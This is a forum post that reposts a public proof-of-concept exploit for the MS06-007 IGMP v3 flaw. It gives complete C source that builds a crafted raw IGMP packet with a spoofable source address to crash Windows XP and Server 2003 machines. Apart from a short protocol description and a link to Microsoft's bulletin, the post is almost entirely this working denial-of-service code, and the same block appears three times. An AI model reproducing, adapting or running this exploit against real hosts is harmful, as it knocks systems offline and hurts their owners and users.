TechAmok Forum Index TechAmok
Independent Technology News
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

IGMP v3 DoS (MS06-007, Exploit)

 
Post new topic   Reply to topic    TechAmok Forum Index -> Software
View previous topic :: View next topic  
Author Message
admin
Site Admin
Site Admin


Joined: 28 Feb 2006
Posts: 887

PostPosted: Wed Mar 22, 2006 4:57 pm    Post subject: IGMP v3 DoS (MS06-007, Exploit) Reply with quote

A specially crafted IGMP packet sent to a vulnerable system could create a denial of service situation and cause the system to stop responding.

Credit:
The original article can be found at:
http://www.milw0rm.com/exploits/1599

Related articles:
TCP/IP IGMP DoS (MS06-007)
http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

Details
Code:

/*
        IGMP v3 DoS Exploit

        ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
        ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

        by Alexey Sintsov (dookie@inbox.ru)

        Req:
                Administrator rights on system
                Windows Firewall off (for sending RAW packets)

        Affected Products:
                Microsoft Corporation Windows XP All
                Microsoft Corporation Windows Server 2003 All
 */


#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "Ws2_32.lib")

typedef struct iphdr
{
        unsigned char verlen; // IP version & length
        unsigned char tos; // Type of service
        unsigned short total_len; // Total length of the packet
        unsigned short ident; // Unique identifier
        unsigned short frag_and_flags; // Flags
        unsigned char ttl; // Time to live
        unsigned char proto; // Protocol (TCP, UDP etc)
        unsigned short checksum; // IP checksum
        unsigned int sourceIP; // Source IP
        unsigned int destIP; // Destination IP
        unsigned short options[2];

} IPHEADER;

typedef struct igmphdr {
          unsigned char type;
          unsigned char code;
                  unsigned short checksum;
                  unsigned long group;
                  unsigned char ResvSQVR;
                  unsigned char QQIC;
                  unsigned short num;
                  unsigned long addes;

 } IGMPHEADER;

USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum=0;

    while (size > 1) {
        cksum += *buffer++;
        size -= sizeof(USHORT);
    }

    if (size)
        cksum += *(UCHAR*)buffer;

    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >>16);

    return (USHORT)(~cksum);
}

int sendIGMP(char* a, char* b)
{
        unsigned int dst_addr, src_addr;

        IPHEADER ipHeader;
        IGMPHEADER igmpHeader;
        dst_addr=inet_addr (b);
        src_addr=inet_addr (a);

        char szSendBuf[60]={0};
        int rect;

        WSADATA WSAData;
        if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
                return FALSE;

        SOCKET sock;
        if ((sock = WSASocket(AF_INET,SOCK_RAW,
                IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) {
                printf("Create socket error");
                WSACleanup();
                return FALSE;
        }

        BOOL flag=TRUE;
        if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
                printf("Set options error");
                closesocket(sock);
                WSACleanup();
                return FALSE;
        }

        SOCKADDR_IN ssin;
        memset(&ssin, 0, sizeof(ssin));
        ssin.sin_family=AF_INET;
        ssin.sin_port=htons(99);
        ssin.sin_addr.s_addr=dst_addr;

        ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
        ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));

        ipHeader.ident=htons(0);

        ipHeader.frag_and_flags=0;

        ipHeader.ttl=128;
        ipHeader.proto=IPPROTO_IGMP;

        ipHeader.checksum=0;

        ipHeader.tos=0;

        ipHeader.destIP=dst_addr;
        ipHeader.sourceIP=src_addr;

        //Ip options
        ipHeader.options[0]=htons(0x0000); //bug is here =)
        ipHeader.options[1]=htons(0x0000);

        igmpHeader.type=0x11; //v3 Membership Query
        igmpHeader.code=5;
        igmpHeader.num=htons(1);
        igmpHeader.ResvSQVR=0x0;
        igmpHeader.QQIC=0;
        igmpHeader.group=inet_addr("0.0.0.0");
        igmpHeader.addes=dst_addr;

        igmpHeader.checksum=0;

        memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));

        igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
        memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);

        ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader)));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

        rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));

        if (rect==SOCKET_ERROR) {
                printf("Send error: <%d>\n",WSAGetLastError());
        closesocket(sock);
                WSACleanup();
                return 0;
        }

        closesocket(sock);
        WSACleanup();

        return 1;
}

main(int argc, char **argv)
{
        if(argc<2)
        {
                printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
                printf("Usage:\n");
                printf("c:\\igmps.exe <target ip> <source ip>\n\n");
                exit(0);
        }

        sendIGMP(argv[2], argv[1]);
        return 0;
}

The Internet Group Management Protocol (IGMP) is a communications protocol used to manage the membership of Internet Protocol multicast groups. IGMP is used by IP hosts and adjacent multicast routers to establish multicast group memberships. It is an integral part of the IP multicast specification, like ICMP for unicast connections.

A specially crafted IGMP packet sent to a vulnerable system could create a denial of service situation and cause the system to stop responding.
 
Credit:
The original article can be found at:
http://www.milw0rm.com/exploits/1599
Related articles:
TCP/IP IGMP DoS (MS06-007)
http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx 
 
 Details
/*
        IGMP v3 DoS Exploit

        ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
        ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

        by Alexey Sintsov (dookie@inbox.ru)

        Req:
                Administrator rights on system
                Windows Firewall off (for sending RAW packets)

        Affected Products:
                Microsoft Corporation Windows XP All
                Microsoft Corporation Windows Server 2003 All
 */


#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "Ws2_32.lib")

typedef struct iphdr
{
        unsigned char verlen; // IP version & length
        unsigned char tos; // Type of service
        unsigned short total_len; // Total length of the packet
        unsigned short ident; // Unique identifier
        unsigned short frag_and_flags; // Flags
        unsigned char ttl; // Time to live
        unsigned char proto; // Protocol (TCP, UDP etc)
        unsigned short checksum; // IP checksum
        unsigned int sourceIP; // Source IP
        unsigned int destIP; // Destination IP
        unsigned short options[2];

} IPHEADER;

typedef struct igmphdr {
          unsigned char type;
          unsigned char code;
                  unsigned short checksum;
                  unsigned long group;
                  unsigned char ResvSQVR;
                  unsigned char QQIC;
                  unsigned short num;
                  unsigned long addes;

 } IGMPHEADER;

USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum=0;

    while (size > 1) {
        cksum += *buffer++;
        size -= sizeof(USHORT);
    }

    if (size)
        cksum += *(UCHAR*)buffer;

    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >>16);

    return (USHORT)(~cksum);
}

int sendIGMP(char* a, char* b)
{
        unsigned int dst_addr, src_addr;

        IPHEADER ipHeader;
        IGMPHEADER igmpHeader;
        dst_addr=inet_addr (b);
        src_addr=inet_addr (a);

        char szSendBuf[60]={0};
        int rect;

        WSADATA WSAData;
        if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
                return FALSE;

        SOCKET sock;
        if ((sock = WSASocket(AF_INET,SOCK_RAW,
                IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) {
                printf("Create socket error");
                WSACleanup();
                return FALSE;
        }

        BOOL flag=TRUE;
        if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
                printf("Set options error");
                closesocket(sock);
                WSACleanup();
                return FALSE;
        }

        SOCKADDR_IN ssin;
        memset(&ssin, 0, sizeof(ssin));
        ssin.sin_family=AF_INET;
        ssin.sin_port=htons(99);
        ssin.sin_addr.s_addr=dst_addr;

        ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
        ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));

        ipHeader.ident=htons(0);

        ipHeader.frag_and_flags=0;

        ipHeader.ttl=128;
        ipHeader.proto=IPPROTO_IGMP;

        ipHeader.checksum=0;

        ipHeader.tos=0;

        ipHeader.destIP=dst_addr;
        ipHeader.sourceIP=src_addr;

        //Ip options
        ipHeader.options[0]=htons(0x0000); //bug is here =)
        ipHeader.options[1]=htons(0x0000);

        igmpHeader.type=0x11; //v3 Membership Query
        igmpHeader.code=5;
        igmpHeader.num=htons(1);
        igmpHeader.ResvSQVR=0x0;
        igmpHeader.QQIC=0;
        igmpHeader.group=inet_addr("0.0.0.0");
        igmpHeader.addes=dst_addr;

        igmpHeader.checksum=0;

        memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));

        igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
        memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);

        ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader)));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

        rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));

        if (rect==SOCKET_ERROR) {
                printf("Send error: <%d>\n",WSAGetLastError());
        closesocket(sock);
                WSACleanup();
                return 0;
        }

        closesocket(sock);
        WSACleanup();

        return 1;
}

main(int argc, char **argv)
{
        if(argc<2)
        {
                printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
                printf("Usage:\n");
                printf("c:\\igmps.exe <target ip> <source ip>\n\n");
                exit(0);
        }

        sendIGMP(argv[2], argv[1]);
        return 0;
}

The Internet Group Management Protocol (IGMP) is a communications protocol used to manage the membership of Internet Protocol multicast groups. IGMP is used by IP hosts and adjacent multicast routers to establish multicast group memberships. It is an integral part of the IP multicast specification, like ICMP for unicast connections.

A specially crafted IGMP packet sent to a vulnerable system could create a denial of service situation and cause the system to stop responding.
 
Credit:
The original article can be found at:
http://www.milw0rm.com/exploits/1599
Related articles:
TCP/IP IGMP DoS (MS06-007)
http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx 
 
 Details
/*
        IGMP v3 DoS Exploit

        ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
        ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

        by Alexey Sintsov (dookie@inbox.ru)

        Req:
                Administrator rights on system
                Windows Firewall off (for sending RAW packets)

        Affected Products:
                Microsoft Corporation Windows XP All
                Microsoft Corporation Windows Server 2003 All
 */


#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "Ws2_32.lib")

typedef struct iphdr
{
        unsigned char verlen; // IP version & length
        unsigned char tos; // Type of service
        unsigned short total_len; // Total length of the packet
        unsigned short ident; // Unique identifier
        unsigned short frag_and_flags; // Flags
        unsigned char ttl; // Time to live
        unsigned char proto; // Protocol (TCP, UDP etc)
        unsigned short checksum; // IP checksum
        unsigned int sourceIP; // Source IP
        unsigned int destIP; // Destination IP
        unsigned short options[2];

} IPHEADER;

typedef struct igmphdr {
          unsigned char type;
          unsigned char code;
                  unsigned short checksum;
                  unsigned long group;
                  unsigned char ResvSQVR;
                  unsigned char QQIC;
                  unsigned short num;
                  unsigned long addes;

 } IGMPHEADER;

USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum=0;

    while (size > 1) {
        cksum += *buffer++;
        size -= sizeof(USHORT);
    }

    if (size)
        cksum += *(UCHAR*)buffer;

    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >>16);

    return (USHORT)(~cksum);
}

int sendIGMP(char* a, char* b)
{
        unsigned int dst_addr, src_addr;

        IPHEADER ipHeader;
        IGMPHEADER igmpHeader;
        dst_addr=inet_addr (b);
        src_addr=inet_addr (a);

        char szSendBuf[60]={0};
        int rect;

        WSADATA WSAData;
        if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
                return FALSE;

        SOCKET sock;
        if ((sock = WSASocket(AF_INET,SOCK_RAW,
                IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) {
                printf("Create socket error");
                WSACleanup();
                return FALSE;
        }

        BOOL flag=TRUE;
        if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
                printf("Set options error");
                closesocket(sock);
                WSACleanup();
                return FALSE;
        }

        SOCKADDR_IN ssin;
        memset(&ssin, 0, sizeof(ssin));
        ssin.sin_family=AF_INET;
        ssin.sin_port=htons(99);
        ssin.sin_addr.s_addr=dst_addr;

        ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
        ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));

        ipHeader.ident=htons(0);

        ipHeader.frag_and_flags=0;

        ipHeader.ttl=128;
        ipHeader.proto=IPPROTO_IGMP;

        ipHeader.checksum=0;

        ipHeader.tos=0;

        ipHeader.destIP=dst_addr;
        ipHeader.sourceIP=src_addr;

        //Ip options
        ipHeader.options[0]=htons(0x0000); //bug is here =)
        ipHeader.options[1]=htons(0x0000);

        igmpHeader.type=0x11; //v3 Membership Query
        igmpHeader.code=5;
        igmpHeader.num=htons(1);
        igmpHeader.ResvSQVR=0x0;
        igmpHeader.QQIC=0;
        igmpHeader.group=inet_addr("0.0.0.0");
        igmpHeader.addes=dst_addr;

        igmpHeader.checksum=0;

        memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));

        igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
        memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);

        ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader)));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

        rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));

        if (rect==SOCKET_ERROR) {
                printf("Send error: <%d>\n",WSAGetLastError());
        closesocket(sock);
                WSACleanup();
                return 0;
        }

        closesocket(sock);
        WSACleanup();

        return 1;
}

main(int argc, char **argv)
{
        if(argc<2)
        {
                printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
                printf("Usage:\n");
                printf("c:\\igmps.exe <target ip> <source ip>\n\n");
                exit(0);
        }

        sendIGMP(argv[2], argv[1]);
        return 0;
}
Back to top
View user's profile Send private message Send e-mail
Display posts from previous:   
Post new topic   Reply to topic    TechAmok Forum Index -> Software All times are GMT - 5 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2016 phpBB Group